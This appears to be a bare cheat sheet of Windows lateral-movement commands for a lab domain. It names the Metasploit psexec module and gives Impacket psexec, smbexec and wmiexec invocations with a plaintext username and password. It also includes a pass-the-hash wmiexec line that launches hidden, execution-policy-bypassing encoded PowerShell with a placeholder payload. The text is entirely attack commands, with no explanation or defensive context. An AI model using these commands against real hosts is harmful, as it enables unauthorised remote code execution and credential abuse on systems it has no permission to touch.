exploit/windows/smb/psexec
psexec.py lab.justin-p.me/dwalker:StrongPass1@10.11.12.101
smbexec.py lab.justin-p.me/dwalker:StrongPass1@10.11.12.101
wmiexec.py lab.justin-p.me/dwalker:StrongPass1@10.11.12.101
wmiexec.py lab.justin-p.me/dwalker@10.11.12.101 'powershell -exec bypass -Noninteractive -windowstyle hidden -e 'PAYLOAD' -hashes a:hash